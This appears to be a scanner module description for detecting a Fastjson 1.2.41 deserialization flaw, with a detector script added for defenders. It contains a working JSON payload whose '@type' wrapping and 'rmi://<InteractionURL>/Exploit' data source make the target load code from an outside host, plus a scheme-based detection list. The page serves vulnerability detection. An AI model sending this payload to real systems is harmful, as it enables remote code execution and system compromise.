
Fastjson 1.2.41 - Remote Code Execution

By kannthu

Critical
Vidoc Module
#fastjson #rce #deserialization #oast
Description

What is "Fastjson 1.2.41 - Remote Code Execution"?

The "Fastjson 1.2.41 - Remote Code Execution" module is designed to detect a critical vulnerability in the Fastjson 1.2.41 software. Fastjson is a Java library used for parsing and generating JSON data. This module specifically targets the Fastjson version 1.2.41 and aims to identify instances where remote code execution (RCE) can occur.

This vulnerability poses a significant risk as it allows attackers to execute arbitrary code on the target system, potentially leading to unauthorized access, data breaches, and system compromise. It is crucial to address this vulnerability promptly to prevent potential exploitation.

The severity of this vulnerability is classified as critical, indicating the high potential for damage and the urgent need for mitigation.

Impact

If successfully exploited, the "Fastjson 1.2.41 - Remote Code Execution" vulnerability can allow attackers to execute arbitrary code on the target system. This can lead to various consequences, including:

- Unauthorized access to sensitive data
- System compromise
- Execution of malicious commands
- Disruption of services

Given the severity of this vulnerability, it is crucial to take immediate action to remediate the issue and protect the affected systems.

How does the module work?

The "Fastjson 1.2.41 - Remote Code Execution" module works by sending a crafted HTTP request to the target system. The request is designed to exploit the specific vulnerability present in Fastjson 1.2.41, which allows for remote code execution.

One example of the HTTP request used by this module is:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
   "@type":"Lcom.sun.rowset.JdbcRowSetImpl",
   "dataSourceName":"rmi://<InteractionURL>/Exploit",
   "autoCommit":true
}

The module includes matching conditions to determine if the vulnerability is present. In this case, the matching conditions include:

- Checking for the presence of the "dns" protocol in the response
- Verifying that the HTTP response status is not 200

If both matching conditions are met, the module identifies the presence of the vulnerability and reports it as a critical issue.

It is essential to regularly scan and patch systems running Fastjson 1.2.41 to mitigate the risk of remote code execution.
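
For defenders, the request shape described above can also be recognised on the receiving side, for example in a proxy or log pipeline that sees JSON request bodies. The following is an added example, not Vidoc's module code or part of the original page: the function names, the scheme list and the severity labels are assumptions, and the sample body is the request shown above with a placeholder host.

```python
import json
import re

# Naming-service URL schemes worth flagging next to an @type key (assumed list).
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://", "dns://")
# Fallback for bodies that are not valid JSON (truncated or malformed on purpose).
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
# Descriptor-style wrapping: leading '[' / 'L' before a package name, trailing ';'.
WRAP_RE = re.compile(r"^\[*L+(?=[a-z][\w$]*\.)")


def normalise(raw):
    return WRAP_RE.sub("", raw.strip()).rstrip(";")


def finding(raw, siblings=()):
    urls = [v for v in siblings
            if isinstance(v, str) and v.lower().startswith(JNDI_SCHEMES)]
    cls = normalise(raw)
    return {"raw_type": raw, "class": cls,
            "wrapped": cls != raw.strip(), "jndi_urls": urls}


def walk(node, out):
    if isinstance(node, dict):
        if isinstance(node.get("@type"), str):
            out.append(finding(node["@type"], node.values()))
        for value in node.values():
            walk(value, out)
    elif isinstance(node, list):
        for value in node:
            walk(value, out)


def inspect_body(body):
    out = []
    try:
        walk(json.loads(body), out)
    except ValueError:
        out.extend(finding(raw) for raw in TYPE_RE.findall(body))
    return out


def severity(f):
    return "high" if f["jndi_urls"] else "medium" if f["wrapped"] else "low"

# Constructed sample: the request body shown above with a placeholder host.
SAMPLE = ('{"@type":"Lcom.sun.rowset.JdbcRowSetImpl",'
          '"dataSourceName":"rmi://oast.example.invalid/Exploit","autoCommit":true}')
```

Comparing the normalised class name, rather than the raw `@type` string, keeps a denylist or alert rule from being sidestepped by the `L` prefix that this module's request relies on.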

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns
and NOT status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability